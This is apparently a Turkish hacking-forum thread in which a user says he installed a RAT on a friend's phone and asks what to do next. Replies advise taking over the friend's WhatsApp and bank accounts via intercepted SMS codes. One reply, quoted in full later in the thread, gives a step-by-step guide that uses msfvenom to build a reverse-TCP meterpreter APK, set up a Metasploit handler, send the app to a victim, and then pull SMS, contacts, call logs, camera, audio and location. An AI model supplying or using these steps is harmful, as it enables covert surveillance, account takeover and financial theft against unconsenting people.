Trojeni hedefe gönderdim şimdi ne yapacağım?

[epeymen]

Şu video ile rat dosyası oluşturdum ve arkadaşımın telefonuna indirdik fakat nerden devam edebileceğimi bilmiyorum yardımcı olurmusunuz ?

 

[Samoyel]

Şu video ile rat dosyası oluşturdum ve arkadaşımın telefonuna indirdik fakat nerden devam edebileceğimi bilmiyorum yardımcı olurmusunuz ?

WhatsApp a giriş yap kendi telefonundan sms doğrulaması istiyo. Girdiğin telden sms lere bak. Banka içinde geçerli.

 

[AHMET SENCER]

Merhaba değerli üye :

Trojanı hedefe gönderdikten sonra msfconsol ile dinlemeye alabilirsin veya başka kullanıçlı araçlarda kullana bilirsin dinlemeye aldıktan sonra gerisi zaten gelir.

Umarım yardımcı olmuşumdur iyi forumlar

 

[Toolbrowser]

Android Hacking Nasıl Yapılır?​

Adım adım ilerleyerek android sisteme sızmaya çalışalım...

Adım 1:​

Öncelikle sızmak istediğimiz telefon için bir tane apk uzantılı payload oluşturmamız ve 4444 portunu kullanmış olduğumuz işletim sisteminde aktif hale getirmemiz gerekiyor.
Haydi oluşturalım...

• msfpayload android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk

ya da

• msfvenom -p android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk

komut satırlarını yazarak payloadımız olacak olan apk dosyasını üretebilirsiniz.





Apk dosyasını oluşturduktan ve 4444 portunu açtıktan sonra sonra ikinci adıma geçebiliriz.

Adım 2:​

Komut satırımıza msfconsole yazarak Metasploit aracını çalıştıralım.

Adım 3:​

• Metasploit çalıştıktan sonra multi-handler exploitini yükleyerek işlemlerimize devam edebiliriz. multi-handler exploit: use exploit/multi/handler

• Ardından payload tipini seçerek payloadımızı ayarlayalım. Android payload: set payload android/meterpreter/reverse_tcp

• Daha sonra host ve port ayarları yapılarak işleme devam edilir. Host: set LHOST ip adresiniz Port: set LPORT 4444

Adım 4:​

Oluşturmuş olduğumuz apk dosyasını ele geçirilmek istenilen kişininin telefonuna gönderilir ve ardından komut satırına exploit yazılarak kurbanın uygulamayı yüklemesi beklenir.






Kurban, apk dosyasını kurduktan itibaren artık mevcut telefon üzerinde istediğiniz şekilde işlem yapabilirsiniz. Erişim sağlanan telefon üzerinde ne tür işlemler yapabileceğinize help yazarak ulaşabilirsiniz.

Kullanılabilinen özellikler listesi şu şekildedir;








Hemen hemen tüm özelliklere baktım ve sizlerle en çok dikkat çeken birkaç özelliği paylaşmak istiyorum.

Kendi bilgisayarınız üzerinden sızmış olduğunuz telefonun;

• Kamerasıyla bulunulan ortamın fotoğrafını çekebilirsiniz,
• Telefonda var olan tüm sms kayıtlarını çekebilirsiniz,
• Bilgisayarınız üzerinden komut satırı ile istediğiniz numaraya kurbanın telefonundan sms gönderebilirsiniz,
• Telefonda var olan tüm rehber kayıtlarını çekebilirsiniz,
• Telefonda var olan tüm arama kayıtlarını çekebilirsiniz,
• Telefon rootlu ise kök dizininde yer alan veri tabanı dosyalarını çekebilirsiniz,
• Telefonun bulunduğu ortamı ses kaydına alabilirsiniz.
• Telefonun o anki konumuna erişme imkanı, o an kullanmış olduğu ip bilgisi, telefonun ekran görüntüsü yani kısaca aklınıza gelen hemen hemen herşeyi uzaktan yapabiliyorsunuz.

Kullanımına ilişkin örnek ekran görüntüsü:



örnekteki gibi istediğiniz özelliğin ismini yazarak sonuna -h parametresini eklediğinizde özelliğin nasıl kullanıldığını size gösterecektir.

 

[FAKULTE]

Android Hacking Nasıl Yapılır?​

Adım adım ilerleyerek android sisteme sızmaya çalışalım...

Adım 1:​

Öncelikle sızmak istediğimiz telefon için bir tane apk uzantılı payload oluşturmamız ve 4444 portunu kullanmış olduğumuz işletim sisteminde aktif hale getirmemiz gerekiyor.
Haydi oluşturalım...

• msfpayload android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk

ya da

• msfvenom -p android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk

komut satırlarını yazarak payloadımız olacak olan apk dosyasını üretebilirsiniz.





Apk dosyasını oluşturduktan ve 4444 portunu açtıktan sonra sonra ikinci adıma geçebiliriz.

Adım 2:​

Komut satırımıza msfconsole yazarak Metasploit aracını çalıştıralım.

Adım 3:​

• Metasploit çalıştıktan sonra multi-handler exploitini yükleyerek işlemlerimize devam edebiliriz. multi-handler exploit: use exploit/multi/handler

• Ardından payload tipini seçerek payloadımızı ayarlayalım. Android payload: set payload android/meterpreter/reverse_tcp

• Daha sonra host ve port ayarları yapılarak işleme devam edilir. Host: set LHOST ip adresiniz Port: set LPORT 4444

Adım 4:​

Oluşturmuş olduğumuz apk dosyasını ele geçirilmek istenilen kişininin telefonuna gönderilir ve ardından komut satırına exploit yazılarak kurbanın uygulamayı yüklemesi beklenir.






Kurban, apk dosyasını kurduktan itibaren artık mevcut telefon üzerinde istediğiniz şekilde işlem yapabilirsiniz. Erişim sağlanan telefon üzerinde ne tür işlemler yapabileceğinize help yazarak ulaşabilirsiniz.

Kullanılabilinen özellikler listesi şu şekildedir;








Hemen hemen tüm özelliklere baktım ve sizlerle en çok dikkat çeken birkaç özelliği paylaşmak istiyorum.

Kendi bilgisayarınız üzerinden sızmış olduğunuz telefonun;

• Kamerasıyla bulunulan ortamın fotoğrafını çekebilirsiniz,
• Telefonda var olan tüm sms kayıtlarını çekebilirsiniz,
• Bilgisayarınız üzerinden komut satırı ile istediğiniz numaraya kurbanın telefonundan sms gönderebilirsiniz,
• Telefonda var olan tüm rehber kayıtlarını çekebilirsiniz,
• Telefonda var olan tüm arama kayıtlarını çekebilirsiniz,
• Telefon rootlu ise kök dizininde yer alan veri tabanı dosyalarını çekebilirsiniz,
• Telefonun bulunduğu ortamı ses kaydına alabilirsiniz.
• Telefonun o anki konumuna erişme imkanı, o an kullanmış olduğu ip bilgisi, telefonun ekran görüntüsü yani kısaca aklınıza gelen hemen hemen herşeyi uzaktan yapabiliyorsunuz.

Kullanımına ilişkin örnek ekran görüntüsü:



örnekteki gibi istediğiniz özelliğin ismini yazarak sonuna -h parametresini eklediğinizde özelliğin nasıl kullanıldığını size gösterecektir.

Teşekkür ederim